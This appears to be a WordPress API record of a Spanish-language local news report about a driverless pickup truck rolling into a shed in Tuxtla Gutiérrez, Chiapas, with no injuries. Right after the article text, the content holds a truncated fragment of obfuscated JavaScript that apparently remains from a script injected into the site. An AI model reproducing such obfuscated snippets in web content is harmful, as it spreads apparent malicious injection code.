{"id":10497,"date":"2023-06-12T02:37:20","date_gmt":"2023-06-12T02:37:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10497"},"modified":"2023-06-12T02:37:20","modified_gmt":"2023-06-12T02:37:20","slug":"camioneta-se-estrella-contra-galera-en-colonia-las-casitas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10497","title":{"rendered":"Camioneta se estrella contra galera en Colonia Las Casitas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686537394033-1024x576.jpg\" alt=\"\" class=\"wp-image-10498\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686537394033-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686537394033-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686537394033-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686537394033.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 11 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la tarde una camioneta se estrell\u00f3 contra una galera en la Colonia Las Casitas Segunda Secci\u00f3n.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando la camioneta Toyota Hilux de color blanco doble cabina que estaba estacionada en una pendiente a la altura de la Avenida 2 y Calle 9 comenz\u00f3 a descender.<\/p>\n\n\n\n<p>Sin ocupantes la camioneta se desplaz\u00f3 unos 20 metros pues al parecer \u00fanicamente qued\u00f3 con el freno de mano lo que provoc\u00f3 que se estrellara contra una galera construida con madera y l\u00e1minas.<\/p>\n\n\n\n<p>Afortunadamente y a pesar de lo aparatoso del accidente \u00fanicamente hubo da\u00f1os materiales.<\/p>\n\n\n\n<p>En el lugar el conductor se hizo cargo de los da\u00f1os y la camioneta fue movida para evitar cuestiones legales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 11 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la tarde una camioneta se estrell\u00f3 contra una galera en la Colonia Las Casitas Segunda Secci\u00f3n. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando la camioneta Toyota Hilux de color blanco doble cabina que estaba estacionada en una &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10498,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10497","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10497","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10497"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10497\/revisions"}],"predecessor-version":[{"id":10499,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10497\/revisions\/10499"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10498"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10497"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10497"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10497"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}